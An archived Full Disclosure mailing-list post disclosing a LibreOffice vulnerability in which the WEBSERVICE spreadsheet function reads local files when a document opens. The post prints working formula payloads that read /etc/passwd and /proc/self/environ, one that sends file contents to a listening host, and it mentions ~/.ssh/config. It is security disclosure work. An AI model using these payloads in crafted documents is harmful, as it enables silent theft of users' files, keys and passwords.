[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] libreoffice remote arbitrary file disclosure

To: fulldisclosure@xxxxxxxxxxxx
Subject: [FD] libreoffice remote arbitrary file disclosure
From: Mikhail Klementev <jollheef@xxxxxxxxxx>
Date: Wed, 7 Feb 2018 19:39:38 +0300

Hello,

After I know that the reported vulnerability was already known to developers,
but they did not include trivial fix to 6.0, but (as the developer said, I did
not check it byself) include to 5.4.5 (it means this is a silent fixed 
vulnerability) with a month lag between updates I think it's more correct to 
full disclose it.

PoC: https://github.com/jollheef/libreoffice-remote-arbitrary-file-disclosure

# Vulnerability description

## First part

LibreOffice supports COM.MICROSOFT.WEBSERVICE function:

    
https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4

The function is required to obtain data by URL, usually used as:

    
=FILTERXML(WEBSERVICE("http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric";);"number(/weatherdata/forecast/time[2]/temperature/@value)")

In original:

    For protocols that are not supported, such as ftp: // or file: //, 
WEBSERVICE returns the #VALUE! error value.

In LibreOffice, these restrictions are not implemented.

## Second part

By default the cells are not updated, but if you specify the cell type like 
~error, then the cell will be updated when you open document.

# Exploitation

To read file you need just:

    =WEBSERVICE("/etc/passwd")

This function can also be used to send a file:

    =WEBSERVICE("http://localhost:6000/?q="; & WEBSERVICE("/etc/passwd"))

For successful operation, you need to send the files of the current user, so 
you need to retrieve current user home path.

    =MID(WEBSERVICE("/proc/self/environ"), FIND("USER=", 
WEBSERVICE("/proc/self/environ")) + 5, SEARCH(CHAR(0), 
WEBSERVICE("/proc/self/environ"), FIND("USER=", 
WEBSERVICE("/proc/self/environ")))-FIND("USER=",

Also you can parse other files too, like a ~/.ssh/config or something like that.

For other than LibreOffice Calc formats you just need embed calc object to 
other document (I checked it works).

# Impact

It is easy to send any files with keys, passwords and anything else. 100% 
success rate, absolutely silent, support all modern versions of LibreOffice and 
may be embedded in almost all formats supporting by LO.

Attachment: signature.asc
Description: PGP signature

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Prev by Date: [FD] SoapUI v5.3.0 Code Execution
Next by Date: [FD] Defense in depth -- the Microsoft way (part 51): Skype's home-grown updater allows escalation of privilege to SYSTEM
Previous by thread: Re: [FD] SoapUI v5.3.0 Code Execution
Next by thread: [FD] Defense in depth -- the Microsoft way (part 51): Skype's home-grown updater allows escalation of privilege to SYSTEM
Index(es):
- Date
- Thread